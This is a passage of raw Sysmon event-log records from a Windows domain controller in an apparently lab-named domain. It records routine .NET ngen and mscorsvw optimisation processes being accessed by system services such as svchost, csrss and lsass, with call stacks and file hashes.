10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.013{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-2D01-000000009A01}5084C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.013{08A6967A-44E1-6000-2701-000000009A01}8804596C:\Windows\system32\taskhostw.exe{08A6967A-44E2-6000-2D01-000000009A01}5084C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b56bc|UNKNOWN(00007FFF9FEA11E2) 154100x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.026{08A6967A-44E2-6000-2D01-000000009A01}5084C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:308C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{08A6967A-44E1-6000-2701-000000009A01}880C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.607{08A6967A-44E2-6000-3001-000000009A01}5044740C:\Windows\system32\conhost.exe{08A6967A-44E3-6000-3401-000000009A01}728C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.592{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44E3-6000-3401-000000009A01}728C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.592{08A6967A-44E2-6000-2D01-000000009A01}50842160C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{08A6967A-44E3-6000-3401-000000009A01}728C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000154404B)|UNKNOWN(0000000001543CFC)|UNKNOWN(0000000001544ADD)|UNKNOWN(0000000001542444)|UNKNOWN(0000000001540B66)|UNKNOWN(000000000154054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 10341000x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.560{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-44E3-6000-3301-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.560{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-44E3-6000-3301-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.513{08A6967A-44E2-6000-3001-000000009A01}5044740C:\Windows\system32\conhost.exe{08A6967A-44E3-6000-3301-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.513{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44E3-6000-3301-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:31.513{08A6967A-44E2-6000-2D01-000000009A01}50842160C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{08A6967A-44E3-6000-3301-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000154404B)|UNKNOWN(0000000001543CFC)|UNKNOWN(0000000001541D03)|UNKNOWN(0000000001540B66)|UNKNOWN(000000000154054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+18f677(wow64) 10341000x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E5-6000-3601-000000009A01}3056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.904{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44E5-6000-3601-000000009A01}3056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.904{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44E5-6000-3601-000000009A01}3056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.561{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E2-6000-3201-000000009A01}2220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.561{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E5-6000-3501-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.545{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44E5-6000-3501-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:33.545{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44E5-6000-3501-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:34.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E6-6000-3701-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:34.123{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44E6-6000-3701-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:34.123{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44E6-6000-3701-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:19:41.983{08A6967A-44E6-6000-3701-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9d4-0\System.dll2021-01-14 13:19:41.983 10341000x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:42.733{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44EE-6000-3901-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:42.733{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44EE-6000-3901-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:42.733{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44EE-6000-3901-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 